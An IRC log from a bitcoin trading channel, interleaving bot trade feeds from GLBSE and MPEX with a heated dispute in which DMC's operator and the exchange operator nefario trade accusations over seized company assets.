[F.GIGA.ETF] 216603 @ 0.000375 = 81.2261 BTC [+] Sep 11 23:35:07 [GLBSE] [FPGAMINING] 19 @ 0.80867 = 15.3647 BTC [+] Sep 11 23:36:00 [MPEX] [S.MPOE] 20281 @ 0.00039765 = 8.0647 BTC [+] Sep 11 23:36:46 [MPEX] [S.DICE] 15000 @ 0.003325 = 49.875 BTC [-] Sep 11 23:38:00 [MPEX] [F.GIGA.ETF] 116722 @ 0.000375 = 43.7708 BTC [+] Sep 11 23:39:18 [GLBSE] [PUREMINING] 6 @ 0.0976 = 0.5856 BTC [+] Sep 11 23:39:58 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 11 23:40:35 [GLBSE] [PUREMINING] 1 @ 0.0976 BTC [+] Sep 11 23:42:33 [MPEX] [S.MPOE] 600 @ 0.00039713 = 0.2383 BTC [-] Sep 11 23:46:03 [MPEX] [S.MPOE] 40700 @ 0.00039709 = 16.1616 BTC [-] Sep 11 23:47:33 omg I know why Chaang-Noi doesn't like me anymore Sep 11 23:48:04 who ? Sep 11 23:48:10 goat. Sep 11 23:48:14 a well known scammer. Sep 11 23:49:02 lol, everyone and their mom is a scammer around here Sep 11 23:49:08 has anyone _not_ been called a scammer by someone? Sep 11 23:49:19 urmom Sep 11 23:49:28 I have ocean front property in Kansas Sep 11 23:49:31 hey guys, kakobrekla is a scammer Sep 11 23:49:36 copumpkin: isnt that the thing now? Sep 11 23:49:37 anyone interested? 20BTC Sep 11 23:49:46 poor k. Sep 11 23:49:48 UPON COPUMPKIN Sep 11 23:49:49 BAM Sep 11 23:49:52 if you have ever had a bitcoin Sep 11 23:49:53 jk. Sep 11 23:49:54 you're a scammer Sep 11 23:49:55 kakobrekla: well, I scam scammers Sep 11 23:50:00 that poor kid in africa? scammer Sep 11 23:50:05 ouch. Sep 11 23:50:06 the chinese government? scammers Sep 11 23:50:10 the nsa and the fbi and the cia? scammers Sep 11 23:50:18 kakobrekla and copumpkin? scammers Sep 11 23:51:15 osi too Sep 11 23:51:26 obsi Sep 11 23:51:30 yup, a scammer Sep 11 23:51:39 extra scammer, since he actually did a lot to help shareholders Sep 11 23:51:44 mi6? Sep 11 23:51:59 [MPEX] [S.MPOE] 29900 @ 0.00039695 = 11.8688 BTC [-] Sep 11 23:52:01 [GLBSE] [BDT] 1 @ 1 BTC [+] Sep 11 23:55:45 ajajha Sep 11 23:55:53 scambrekla lmao Sep 11 23:56:02 ppl certainly sold asicminer quick as soon as I announced the past Sep 11 23:56:02 I SCAM U! Sep 11 23:56:39 cmon people give me all your money Sep 11 23:56:41 lets make some bets Sep 11 23:56:42 whatever Sep 11 23:56:59 [MPEX] [S.MPOE] 3500 @ 0.00039695 = 1.3893 BTC [-] Sep 11 23:57:01 [MPEX] [S.MPOE] 10123 @ 0.00039674 = 4.0162 BTC [-] Sep 11 23:58:04 ok nuff of this, im or else im really going to see deposits. Sep 12 00:00:00 [MPEX] [S.MPOE] 4800 @ 0.00039709 = 1.906 BTC [+] Sep 12 00:04:00 [MPEX] [F.GIGA.ETF] 21080 @ 0.0004259 = 8.978 BTC [+] Sep 12 00:04:02 [MPEX] [S.BVPS] 21 @ 0.00351853 = 0.0739 BTC [-] Sep 12 00:04:02 [MPEX] [S.BVPS] 79 @ 0.00345961 = 0.2733 BTC [-] Sep 12 00:07:00 [MPEX] [S.MPOE] 17529 @ 0.00039674 = 6.9545 BTC [-] Sep 12 00:07:01 [MPEX] [S.MPOE] 31400 @ 0.00039641 = 12.4473 BTC [-] Sep 12 00:07:03 [MPEX] [S.MPOE] 5971 @ 0.00039614 = 2.3654 BTC [-] Sep 12 00:12:12 [GLBSE] [MU] 1 @ 0.265 BTC [-] Sep 12 00:12:17 [MPEX] [S.MPOE] 3600 @ 0.00039709 = 1.4295 BTC [+] Sep 12 00:15:55 [GLBSE] [BDT] 2 @ 1 = 2 BTC [+] Sep 12 00:16:00 [MPEX] [S.MPOE] 8100 @ 0.0003964 = 3.2108 BTC [-] Sep 12 00:19:59 [MPEX] [S.MPOE] 15566 @ 0.0003964 = 6.1704 BTC [-] Sep 12 00:24:00 [MPEX] [S.MPOE] 5972 @ 0.00039709 = 2.3714 BTC [+] Sep 12 00:24:01 [MPEX] [S.MPOE] 4528 @ 0.00039765 = 1.8006 BTC [+] Sep 12 00:25:09 [GLBSE] [MU] 2 @ 0.27 = 0.54 BTC [+] Sep 12 00:28:07 [GLBSE] [PUREMINING] 1 @ 0.0976 BTC [+] Sep 12 00:29:47 [GLBSE] [OBSI.HRPT] 9 @ 0.1000001 = 0.9 BTC [-] Sep 12 00:30:47 welp, Ive been doing the math here Sep 12 00:31:22 ewww math Sep 12 00:31:25 if nefario gets away with it, thats about 2 years of lost profits. Sep 12 00:31:57 maybe more Sep 12 00:32:02 [GLBSE] [GSDPT] 5 @ 0.003399 = 0.017 BTC [-] Sep 12 00:32:46 [GLBSE] [GSDPT] 1 @ 0.00339999 BTC [+] Sep 12 00:32:58 [GLBSE] [PUREMINING] 9 @ 0.0976 = 0.8784 BTC [+] Sep 12 00:33:58 [MPEX] [F.GIGA.ETF] 5820 @ 0.00042234 = 2.458 BTC [-] Sep 12 00:34:00 [MPEX] [F.GIGA.ETF] 12500 @ 0.0004291 = 5.3638 BTC [+] Sep 12 00:34:39 makes me wonder if its even worth it Sep 12 00:34:55 wha happen? Sep 12 00:35:04 dub: nefario stole about 1600 BTC of assets from DMC Sep 12 00:35:14 [GLBSE] [KRAKEN] 200 @ 0.0096 = 1.92 BTC [-] Sep 12 00:35:23 maybe Ill just let him win Sep 12 00:35:47 [GLBSE] [KRAKEN] 100 @ 0.00950001 = 0.95 BTC [-] Sep 12 00:36:09 [GLBSE] [KRAKEN] 2 @ 0.0095 = 0.019 BTC [-] Sep 12 00:36:10 pirate won, bitcoinica won, and now nefario will win Sep 12 00:36:13 dub: somebody set up us the bomb Sep 12 00:37:26 maybe the people I know are right Sep 12 00:37:36 bitcoin was a scam and I should have listened Sep 12 00:37:45 [GLBSE] [PUREMINING] 16 @ 0.0976 = 1.5616 BTC [+] Sep 12 00:38:03 Diablo-D3: we're all just props in a massive scam against you Sep 12 00:38:07 I am, at least Sep 12 00:38:21 [GLBSE] [YABMC] 2 @ 0.1005 = 0.201 BTC [-] Sep 12 00:38:22 [GLBSE] [YABMC] 1 @ 0.1005 BTC [-] Sep 12 00:38:23 [GLBSE] [YABMC] 36 @ 0.100461 = 3.6166 BTC [-] Sep 12 00:38:24 oh shush copumpkin Sep 12 00:38:27 Im not in the mood Sep 12 00:38:43 sowwy :( Sep 12 00:39:20 maybe its 4 years down the drain Sep 12 00:39:42 Ive fought for bitcoin for the past two years, and now Im two years behind on dmc because of nefario Sep 12 00:39:52 all a waste Sep 12 00:40:31 If you bought hardware, did not do your swapping trades, all would be just fine diablo Sep 12 00:40:46 all you fucking people think is about mining Sep 12 00:41:00 [MPEX] [S.MPOE] 25589 @ 0.00039681 = 10.154 BTC [-] Sep 12 00:41:07 It`s in your ¨initial¨ contract Sep 12 00:41:13 yes, as one part of it! Sep 12 00:41:30 mining company is about mining or am I the stupid one now Sep 12 00:41:54 I think Im going to tell the company I was going to do the dedi/cloud stuff with that Im no longer interested Sep 12 00:42:34 tell your to you you mean by company Sep 12 00:42:46 there is no board\ Sep 12 00:42:50 so Sep 12 00:42:54 its all you Sep 12 00:42:55 what the fuck are you even talking about Sep 12 00:43:01 dmc Sep 12 00:43:05 its all you Sep 12 00:43:15 no board, direction Sep 12 00:43:15 DMC was going to resell dedi/cloud products in btc. Sep 12 00:43:42 theres no point in pursuing it anymore if 2 years of profits from that are going to be sunk. Sep 12 00:43:51 you told me, I dont believe in that , ask rg Sep 12 00:44:14 rg wanted to resell dmc's offering. Sep 12 00:44:17 but fuck it Sep 12 00:44:22 I just dont give a shit now Sep 12 00:44:46 whats the point Sep 12 00:44:54 I dont hate you Diablo, but I think you just failed Sep 12 00:44:57 even usagi, who I considered a trusted advisor through me under the bus Sep 12 00:44:59 [MPEX] [S.MPOE] 17011 @ 0.00039681 = 6.7501 BTC [-] Sep 12 00:45:01 [MPEX] [S.MPOE] 557 @ 0.0003964 = 0.2208 BTC [-] Sep 12 00:45:02 [MPEX] [S.MPOE] 29552 @ 0.00039614 = 11.7067 BTC [-] Sep 12 00:45:27 PsychoticBoy: yeah, I did fail. I trusted people, and the moment something happens Im the one left holding the bag. Sep 12 00:45:56 Diablo-D3: why was suspending dividends on DMC even a vote? Sep 12 00:46:12 I voted NO Sep 12 00:46:20 I have 12 dmc ;) Sep 12 00:46:22 copumpkin: because there were a lot of cheap assets and we hit the market bottom Sep 12 00:46:23 i didn't 'want' to Sep 12 00:46:27 I mean, dividend decisions aren't usually up for shareholder vote Sep 12 00:46:32 i was considering it as an option Sep 12 00:46:34 it's a management decision in real companies Sep 12 00:46:35 and wtf happened Sep 12 00:46:38 whether to pay dividends Sep 12 00:46:39 wat are you all complaining about Sep 12 00:46:40 [GLBSE] [ASICMINER] 7 @ 0.1017 = 0.7119 BTC [-] Sep 12 00:46:41 copumpkin: because this is fucking bitcoin Sep 12 00:46:49 I cant take a fucking shit without shareholder approval Sep 12 00:47:03 Diablo-D3: no shareholder is ever going to vote anything but "more money" :P Sep 12 00:47:09 it's just stupid for it to be a shareholder vote Sep 12 00:47:14 indeed Sep 12 00:47:19 moar Sep 12 00:47:23 ;) Sep 12 00:47:38 furthermore, it's stupid for a company to be able to vote on itself Sep 12 00:47:51 *poorly Sep 12 00:47:53 copumpkin: dmc never voted on itself, it cant Sep 12 00:47:53 [GLBSE] [GIGAMINING] 1 @ 0.6195 BTC [+] Sep 12 00:48:00 [MPEX] [S.MPOE] 5200 @ 0.00039765 = 2.0678 BTC [+] Sep 12 00:48:04 Diablo-D3: oh, I thought glbse allowed that Sep 12 00:48:07 nope. Sep 12 00:49:04 so it's glbse that requires that you get a shareholder vote for dividend changes? Sep 12 00:49:07 or was that you? Sep 12 00:49:10 [GLBSE] [GSDPT] 78 @ 0.00339999 = 0.2652 BTC [+] Sep 12 00:49:27 copumpkin: over half of issued shares voted, the vote was 10 to 1 Sep 12 00:49:32 [GLBSE] [PUREMINING] 5 @ 0.099 = 0.495 BTC [+] Sep 12 00:49:47 [GLBSE] [CPA] 40 @ 0.031 = 1.24 BTC [+] Sep 12 00:49:48 Diablo-D3: that's fine, I was just wondering whether that was a glbse requirement or whether you chose to Sep 12 00:49:58 I chose to. Sep 12 00:50:00 ah Sep 12 00:50:39 the contract openly lets me borrow from current and future dividends if I deem it necessary Sep 12 00:51:37 seeing as I was about to announce the deal on dedi/cloud shit, we could double down on asset purchases for a short time Sep 12 00:51:43 the motion was for three months Sep 12 00:52:02 get the shit while its cheap instead of having to pay more later Sep 12 00:52:16 but whatever Sep 12 00:53:07 [GLBSE] [PUREMINING] 8 @ 0.099 = 0.792 BTC [+] Sep 12 00:53:10 copumpkin: not only that, as part of the negotiations with usagi, I was going to just reverse the motion anyhow Sep 12 00:53:17 ah Sep 12 00:53:26 even though he voted as the majority in that vote Sep 12 00:54:00 [MPEX] [S.MPOE] 177 @ 0.00039614 = 0.0701 BTC [-] Sep 12 00:54:01 [MPEX] [S.MPOE] 2323 @ 0.00039557 = 0.9189 BTC [-] Sep 12 00:55:41 copumpkin: I dont know what the fuck people want out of me Sep 12 00:55:54 I think that forum should be dismantled :P Sep 12 00:55:54 I was getting usagi to insure and manage the company assets so I could work on DMC fulltime Sep 12 00:56:01 it's a poisonous community Sep 12 00:56:03 lots of good information on it Sep 12 00:56:09 DMC is still going? Sep 12 00:56:12 but it's buried in a sea of diarrhea Sep 12 00:56:26 I was doing the whole dedi/cloud stuff in the background Sep 12 00:56:30 and when its finally all coming together Sep 12 00:56:41 nefario just comes in and fucks it all up Sep 12 00:56:49 [GLBSE] [ASICMINER] 50 @ 0.10499 = 5.2495 BTC [+] Sep 12 00:57:06 copumpkin: I mean, fuck, I own half of fucking obsi.abmo Sep 12 00:57:18 how many fucking companies on glbse own half of another fucking company Sep 12 00:58:53 usagi: no, but thats not what you said at the time Sep 12 00:59:00 [MPEX] [F.GIGA.ETF] 20100 @ 0.00043672 = 8.7781 BTC [+] Sep 12 00:59:01 [MPEX] [S.MPOE] 9407 @ 0.00039557 = 3.7211 BTC [-] Sep 12 00:59:02 you're only saying this shit so nefario doesnt shut your shit down too Sep 12 00:59:07 if I'm a scammer, you're one too Sep 12 00:59:24 usagi: I wanted cpa to insure it and nyan or bmf to manage it Sep 12 00:59:32 usagi: return it to what? Sep 12 00:59:34 its not returned to me Sep 12 00:59:37 this is what I call a bidwall: http://snapplr.com/hx3x Sep 12 01:00:03 usagi: you lose it all? fuck you dude Sep 12 01:00:06 _I_ lose it all Sep 12 01:00:14 2 years of fucking hard work Sep 12 01:00:14 gone Sep 12 01:00:27 thats how long Ive been here Sep 12 01:00:33 this is how long Ive been spreading the word of bitcoin Sep 12 01:00:47 spread my ass Sep 12 01:00:55 DMC was to be the company that brings all the major investors to bitcoin Sep 12 01:01:12 ?me is done whit this shit! Sep 12 01:01:14 I apologize for one thing and one thing only: I thought it was possible. Sep 12 01:01:22 apparently I was wrong. Sep 12 01:01:56 [MPEX] [S.MPOE] 13000 @ 0.00039557 = 5.1424 BTC [-] Sep 12 01:02:20 I worked 2 fucking years trying to turn bitcoin into something that could do a lot of good Sep 12 01:02:46 and guess what, I was wrong! Sep 12 01:02:48 yeah you did this, you did that, bla bla no, next subject Sep 12 01:02:53 Ive been wrong the whole fucking time Sep 12 01:02:59 indeed Sep 12 01:03:06 [GLBSE] [CBGB] 20 @ 0.5 = 10 BTC [+] Sep 12 01:03:08 [GLBSE] [GMVT-BOT] 10 @ 0.14 = 1.4 BTC [+] Sep 12 01:03:31 usagi: no, I think Im done with it. Sep 12 01:03:51 Diablo-D3: I wouldn't take it too personally. It's a raging lynchmob on there Sep 12 01:03:55 you convinced me to burn a bridge between me an obsi, you burned a bridge when you threw me under that bus, and nefario cant even be trusted to do shit Sep 12 01:03:56 they even accuse me of being a scamer! Sep 12 01:03:57 me! Sep 12 01:04:00 scammer Sep 12 01:04:08 http://wild-life1111.blogspot.com/2011/08/cute-cats_10.html <----cats Sep 12 01:04:13 jamie-lang: meow Sep 12 01:04:20 woof Sep 12 01:04:23 lol Sep 12 01:04:24 oink Sep 12 01:04:41 copumpkin: I just dont care anymore. Sep 12 01:04:47 this isnt the bitcoin I started with Sep 12 01:05:01 [GLBSE] [KRAKEN] 2 @ 0.00999999 = 0.02 BTC [+] Sep 12 01:05:09 this used to be a small group of really nice people Sep 12 01:05:20 I am nice :D Sep 12 01:05:33 and I am here since day 1 Sep 12 01:05:35 Diablo-D3: I'm pretty nice Sep 12 01:05:37 Now it's a moderately large group of strange people Sep 12 01:05:39 I only joined last june Sep 12 01:05:43 I dont know how sipa and gmaxwell and the rest do it Sep 12 01:05:44 Who are you people anyway Sep 12 01:05:44 jamie-lang: yeah, I am strange Sep 12 01:06:59 [MPEX] [S.MPOE] 32174 @ 0.00039557 = 12.7271 BTC [-] Sep 12 01:07:01 [MPEX] [S.MPOE] 240 @ 0.00039526 = 0.0949 BTC [-] Sep 12 01:11:04 anyhow, nefario says hes letting this up to "shareholder vote" Sep 12 01:11:20 since no one can actually view the outcome of this vote that I trust, whats the point Sep 12 01:12:02 and hes probably going to steal the DMC shares from usagi before the vote Sep 12 01:12:45 so nefario gets what he wants Sep 12 01:13:04 he gets to keep the 1600 BTC in assets and claim he liquidated them and pay out like 10 BTC Sep 12 01:13:05 and call it even Sep 12 01:13:14 that scam is so brilliant I wish I thought of it Sep 12 01:13:30 what scam? Sep 12 01:13:59 [MPEX] [S.MPOE] 25400 @ 0.00039513 = 10.0363 BTC [-] Sep 12 01:15:01 jamie-lang: nefario locked dmc's account Sep 12 01:15:14 and now hes going to claim to liquidate it Sep 12 01:15:44 So DMC is the scam? Sep 12 01:15:48 jamie-lang: no Sep 12 01:15:54 DMC is my company Sep 12 01:16:08 nefario says shareholders pressured him to do this Sep 12 01:16:09 no one did Sep 12 01:16:26 I could had trade 9 dmc for 1 asicminer but i was not intrested Sep 12 01:16:41 usagi: no Sep 12 01:16:43 just you and one other guy Sep 12 01:16:45 This doesn't make much sense Sep 12 01:16:59 [MPEX] [F.GIGA.ETF] 5800 @ 0.00043672 = 2.533 BTC [+] Sep 12 01:17:01 [MPEX] [F.GIGA.ETF] 22000 @ 0.00043719 = 9.6182 BTC [+] Sep 12 01:17:02 usagi: one person out traded you Sep 12 01:17:15 usagi: how do you think I ended up with almost 4000 shares of asicminer Sep 12 01:17:17 it wasnt from you. Sep 12 01:17:23 not all of it, anyways Sep 12 01:17:27 nope. Sep 12 01:17:29 Im not. Sep 12 01:17:43 because Im not a fucking asshole who pastes private logs on the forum. Sep 12 01:18:34 in the end all pieces will come together, nefario knows who traded it Sep 12 01:18:56 usagi: yes, but Im still the one that lost the biggest. Sep 12 01:20:00 [MPEX] [S.MPOE] 1786 @ 0.00039513 = 0.7057 BTC [-] Sep 12 01:20:02 [MPEX] [S.MPOE] 12075 @ 0.00039765 = 4.8016 BTC [+] Sep 12 01:20:03 [MPEX] [S.MPOE] 9739 @ 0.00039811 = 3.8772 BTC [+] Sep 12 01:20:26 usagi: I could have had a large company that helped a lot of people Sep 12 01:20:31 instead, everyone loses out Sep 12 01:20:48 my shareholders lose, the people of maine lose, everyone who uses bitcoins lose Sep 12 01:21:15 and my one fucking chance to fix this shithole of a planet, I lose that. Sep 12 01:21:35 [GLBSE] [OBSI.HRPT] 3 @ 0.1017 = 0.3051 BTC [+] Sep 12 01:21:45 usagi: so dont you dare tell me this is bigger than me Sep 12 01:21:47 it always was Sep 12 01:22:32 [GLBSE] [BDK.BND] 1 @ 0.0999 BTC [-] Sep 12 01:22:59 [MPEX] [F.GIGA.ETF] 22500 @ 0.00043457 = 9.7778 BTC [-] Sep 12 01:23:01 [MPEX] [S.MPOE] 35661 @ 0.00039811 = 14.197 BTC [+] Sep 12 01:23:02 [MPEX] [S.MPOE] 3300 @ 0.0003993 = 1.3177 BTC [+] Sep 12 01:23:03 [MPEX] [S.MPOE] 5582 @ 0.00039943 = 2.2296 BTC [+] Sep 12 01:23:52 I took the biggest fucking problems I thought I could handle if I tried hard enough and went at it Sep 12 01:23:57 apparently I didnt try hard enough Sep 12 01:24:30 [GLBSE] [BITCOINMINV] 1 @ 0.12 BTC [+] Sep 12 01:27:27 [GLBSE] [GMVT-BOT] 8 @ 0.13999999 = 1.12 BTC [-] Sep 12 01:27:35 [GLBSE] [COGNITIVE] 1 @ 0.52 BTC [+] Sep 12 01:27:37 [GLBSE] [COGNITIVE] 1 @ 0.51 BTC [-] Sep 12 01:27:38 [GLBSE] [COGNITIVE] 6 @ 0.5 = 3 BTC [-] Sep 12 01:28:17 [GLBSE] [SILVER] 3 @ 0.00999999 = 0.03 BTC [+] Sep 12 01:28:44 [GLBSE] [SILVER] 2 @ 0.01 = 0.02 BTC [+] Sep 12 01:29:00 [MPEX] [S.MPOE] 500 @ 0.00039498 = 0.1975 BTC [-] Sep 12 01:29:01 [MPEX] [S.MPOE] 600 @ 0.0003949 = 0.2369 BTC [-] Sep 12 01:31:37 [MPEX] [F.GIGA.ETF] 10100 @ 0.00043719 = 4.4156 BTC [+] Sep 12 01:31:39 [MPEX] [F.GIGA.ETF] 30341 @ 0.00043839 = 13.3012 BTC [+] Sep 12 01:31:40 [MPEX] [S.MPOE] 46600 @ 0.0003949 = 18.4023 BTC [-] Sep 12 01:31:41 [MPEX] [S.MPOE] 3100 @ 0.00039479 = 1.2238 BTC [-] Sep 12 01:32:40 [GLBSE] [BBBB] 5 @ 0.000239 = 0.0012 BTC [-] Sep 12 01:33:14 [GLBSE] [BMF] 100 @ 0.5 = 50 BTC [-] Sep 12 01:33:58 [GLBSE] [NYAN] 7 @ 0.88 = 6.16 BTC [-] Sep 12 01:39:26 man Sep 12 01:39:34 this channel is emo Sep 12 01:39:57 goat and diablo having a good old crank Sep 12 01:40:03 ;;ud crank Sep 12 01:40:04 [MPEX] [S.MPOE] 1073 @ 0.00039593 = 0.4248 BTC [+] Sep 12 01:40:04 http://www.urbandictionary.com/define.php?term=crank | Slang, noun. “Crank” is slang for a low purity, crystallized Methamphetamine that is administered in a powder form. Crank, like all other Methamphe... Sep 12 01:40:13 WRONG UD Sep 12 01:40:24 ;;ud cry wank Sep 12 01:40:24 http://www.urbandictionary.com/define.php?term=Cry%20wank | The ultimate display of self love/loathing, rubbing one out while weeping, superceded only by the ultimate cry wank, involving weeping while wankin... Sep 12 01:40:37 thats disgusting, dub. Sep 12 01:40:42 [GLBSE] [PUREMINING] 3 @ 0.099 = 0.297 BTC [+] Sep 12 01:40:45 and why the fuck would goat be doing that Sep 12 01:40:46 he won Sep 12 01:40:55 Chaang-Noi now thinks I'm dishonest! Sep 12 01:41:05 he walked off with all that money and didnt get shit from anyone Sep 12 01:41:19 and doesnt afraid of nefario Sep 12 01:41:53 all this is tl;dr Sep 12 01:42:27 I still don't know wha happen with DMC Sep 12 01:42:58 I am concerned that my DMC share that I spent 1 satoshi on is even less valuable however Sep 12 01:43:00 [MPEX] [F.GIGA.ETF] 259 @ 0.00043883 = 0.1137 BTC [+] Sep 12 01:43:01 [MPEX] [F.GIGA.ETF] 4400 @ 0.00043457 = 1.9121 BTC [-] Sep 12 01:43:09 dub: its now worth 0. Sep 12 01:43:19 Diablo-D3: SCAMMER Sep 12 01:43:24 :D Sep 12 01:43:25 yes, nefario is Sep 12 01:44:41 DMC is no more? Sep 12 01:45:00 dub: basically, nefario is going to end up with 1600 BTC in assets, "liquidate" them, and pay DMC shareholders 50 BTC, while keeping the rest Sep 12 01:45:24 dub: he says hes going to let the shareholders vote, but hes stripping the largest DMC shareholders of their shares before the vote Sep 12 01:45:28 Diablo-D3 has been suspended as the admin of DMC for gross incompetence Sep 12 01:45:46 pending an investigation and shareholder vote on whether to keep him or not Sep 12 01:46:01 nefario: the only one that needs an investigation is you Sep 12 01:46:10 WTF? I'm so confused. Sep 12 01:46:20 OneMiner: nefario can no longer be trusted Sep 12 01:46:26 Is there a link that goes with this? Sep 12 01:46:35 if he is removed a suitable replacement will be found, if we are unable to find a replacement DMC will be liquidated and the funds returned to shareholders Sep 12 01:46:39 even if nefario apologizes to the DMC shareholders, its already done with Sep 12 01:46:48 nefario: how the fuck do you replace me? Sep 12 01:47:04 dumbass. Sep 12 01:47:10 nefario: why was this initiated? Sep 12 01:47:12 from what I've learned you weren't doing anything except devaluing DMC Sep 12 01:47:17 dub: nefario wants the money Sep 12 01:47:30 nefario: serious question, shareholders complained? Sep 12 01:47:36 ouch, Diablo-D3 your ego must be smarting Sep 12 01:47:48 dub: a lot of shareholders complained Sep 12 01:47:49 nefario: not really, but hey, you win Sep 12 01:47:51 for weeks Sep 12 01:47:53 run off with the money Sep 12 01:48:22 I cant afford to fight you, especially with DMC's assets locked up Sep 12 01:48:26 and it'd probably take all of them anyhow Sep 12 01:49:04 what do you mean fight me? Sep 12 01:49:15 you have stolen 1600 BTC of assets from DMC. Sep 12 01:49:21 right, so this is what I expected tbh Sep 12 01:49:21 I demand that they be returned. Sep 12 01:49:22 I've done no such thing Sep 12 01:50:12 nefario: and I demand you turn over a list of shareholders and the number of shares they own Sep 12 01:50:31 [MPEX] [F.GIGA.ETF] 7600 @ 0.00043227 = 3.2853 BTC [-] Sep 12 01:52:24 lol Sep 12 01:52:50 they paid to be invested in DMC, and they deserve all future dividends Sep 12 01:53:01 thats pirate talk Sep 12 01:53:06 not only have you stolen 1600 BTC of assets from them, you've stolen all future dividends Sep 12 01:53:13 I'm curious, under what authority/conditions can assets be siezed and new admins installed? Sep 12 01:53:27 OneMiner: I dont know how the fuck he is even going to install someone else Sep 12 01:53:29 DMC is mine. Sep 12 01:53:53 what, is he going to call up the company I was working a reseller contract out with and steal the contract too/ Sep 12 01:53:57 I'm trying to wrap my head around this. Sep 12 01:54:47 OneMiner: nefario was paid 20 btc to do a job, and now hes defaulting on his contract Sep 12 01:54:59 [MPEX] [F.GIGA.ETF] 4405 @ 0.00043115 = 1.8992 BTC [-] Sep 12 01:55:02 there is no reason to think he wont do this to everyone else as well Sep 12 01:55:36 Do you have a statement on the claim that you were devaluing DMC? Sep 12 01:55:43 What is that based on? Sep 12 01:55:54 !pl Sep 12 01:55:54 !pl [@] [] Sep 12 01:55:55 OneMiner: Ive made two major statements already Sep 12 01:56:04 I've missed them. Sep 12 01:56:07 I'll scroll up. Sep 12 01:56:11 !pl DMC 1@2012-01-01 Sep 12 01:56:11 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 12 01:56:14 DMC [1@2BTC] paid: 0.02635814 BTC. Last price: 0.05999999 BTC. Capital gain: -1.94000001 BTC. Total: -1.91364187 BTC. (-95.7%) Sep 12 01:56:25 ^ statement Sep 12 01:56:40 OneMiner: but notice nefario did _nothing_ to stop the fixed mhash bond holders from selling bonds and destroy the market Sep 12 01:56:52 1mhs bonds went from the 0.30s down to the 0.10s over a month period Sep 12 01:57:01 wheres the nefario witch hunt there? Sep 12 01:57:09 Ya, I took one look at them and cringed. Sep 12 01:57:19 DMC lost about 1000 BTC there Sep 12 01:57:24 I stopped it from becoming a complete loss Sep 12 01:57:34 that could have been a 3000 BTC loss and I got out while doubling the mhash we had Sep 12 01:57:38 how is that anything to do with nefario? Sep 12 01:57:47 the market decided that Sep 12 01:57:48 It's a bet that network hashrate will reduce. Fixed mining is a hedge. Sep 12 01:57:49 dub: wheres his investigation there? Sep 12 01:57:59 [MPEX] [F.GIGA.ETF] 6200 @ 0.00043227 = 2.6801 BTC [+] Sep 12 01:57:59 why didnt he lock their accounts? Sep 12 01:58:35 OneMiner: basically, the fixed bond holders sold bonds for hardware that didnt exist Sep 12 01:58:49 pocketed hundreds or thousands of btc Sep 12 01:58:49 Now that sounds scammy. Sep 12 01:59:00 then they pyramid pay it out until they buy asic hardware at a fraction of the cost Sep 12 01:59:11 they keep most of the money, and the bond purchasers get fucked Sep 12 01:59:20 they sold into the bid walls Sep 12 01:59:31 I realized what they were doing and jumped out as fast as possible Sep 12 01:59:55 OneMiner: but hey, its blame diablo day! Sep 12 01:59:56 Well, snap. In the event of a default there wouldn't be mining hardware to sell. Yikes. I'll ask for pics if I decide to invest in one of these. :P Sep 12 02:00:36 OneMiner: the loss could have been worse but I managed to make leave us with some assets Sep 12 02:01:00 [MPEX] [S.MPOE] 48800 @ 0.00039825 = 19.4346 BTC [+] Sep 12 02:01:06 but apparently its my fault for keeping DMC alive. Sep 12 02:01:24 OneMiner: its also my fault for becoming owner of half of obsi.abmo Sep 12 02:02:00 Wow. So, prices were falling like rocks. You liquidated hardware (?) and then nefario steped in? Sep 12 02:02:05 I think its ultimately bad that nefario has stepped in here Sep 12 02:02:10 OneMiner: liquidated bonds Sep 12 02:02:15 people putting money into DMC are idiots Sep 12 02:02:21 they deserve to lose Sep 12 02:02:40 OneMiner: sold them and invested them in non-fixed asset backed shares Sep 12 02:02:44 I see I see, so you raised more capital by releasing bonds. Diluting the market and then nefario steped in. Sep 12 02:02:47 the entire DMC idea is retarded and anyone with half a clue can see this Sep 12 02:02:59 OneMiner: no Sep 12 02:03:04 Arrgh Sep 12 02:03:06 OneMiner: dmc owned bonds in other people's mining ops Sep 12 02:03:07 lol Sep 12 02:03:15 those other people decided to fuck bondholders Sep 12 02:03:17 caveat emptor imperialist pigdogs Sep 12 02:03:28 I dropped the bonds at a loss but kept it from destroying dmc Sep 12 02:03:35 nefario is now completing the job. Sep 12 02:03:59 [MPEX] [S.MPOE] 9727 @ 0.00039825 = 3.8738 BTC [+] Sep 12 02:04:00 [MPEX] [S.MPOE] 15473 @ 0.00039675 = 6.1389 BTC [-] Sep 12 02:04:08 OneMiner: he has made it clear on the DMC thread that he wants to fuck every DMC shareholder Sep 12 02:04:31 OneMiner: and they dont even understand what he said Sep 12 02:04:43 he said hes doing it "for the shareholders" and that "shareholders started it" Sep 12 02:05:01 destroying every dime they put into DMC and keeping it for himself is not "for the shareholders" Sep 12 02:05:10 I'm trying to wrap my head around this. << you're not alone. Sep 12 02:05:25 OneMiner: I dont get when the fuck we elected nefario as our SEC either Sep 12 02:05:45 Sooooo, because you sold assets (owned by DMC) in preperation for some future move, he's siezed the BTC that DMC had in GLBSE? Do I have it right now? I'll feel stupid if not! D: Sep 12 02:05:55 OneMiner: almost Sep 12 02:06:04 I sold assets dmc owned to buy other assets. Sep 12 02:06:07 all on glbse. Sep 12 02:06:11 no Sep 12 02:06:21 you sold the promise of future assets for mining bonds Sep 12 02:06:33 dub: no, current assets with future value Sep 12 02:06:37 [GLBSE] [YABMC] 2 @ 0.1095 = 0.219 BTC [+] Sep 12 02:06:39 [GLBSE] [YABMC] 6 @ 0.1095 = 0.657 BTC [+] Sep 12 02:06:59 Ah ha! So he siezed all DMC assets that took the form of bonds. In other words, everything of DMC's he could get his hands on. Sep 12 02:07:01 the 'promise of future value' backed by your percieved expertise in mining Sep 12 02:07:08 OneMiner: exactly Sep 12 02:07:15 OneMiner: he cant touch the upcoming dedi/cloud stuff Sep 12 02:07:22 when in fact, you have no expertise and there was never any value in DMC Sep 12 02:07:26 but he can block all dividends by destroying dmc's shares Sep 12 02:07:42 OneMiner: so I end up with money and no one to send it to Sep 12 02:07:57 Diablo-D3: you know, if you wanted to continue paying DMC shareholders dividends it could easily be arranged Sep 12 02:07:59 [MPEX] [S.MPOE] 26800 @ 0.00039858 = 10.6819 BTC [+] Sep 12 02:08:00 and you created a mechanism for people to profit from swapping your worthless shares for mining bonds Sep 12 02:08:05 Wow, the more I hear the more screwed it sounds. Sep 12 02:08:19 nefario: no one trusts you with the money. Sep 12 02:08:25 no one will EVER trust you with money again Sep 12 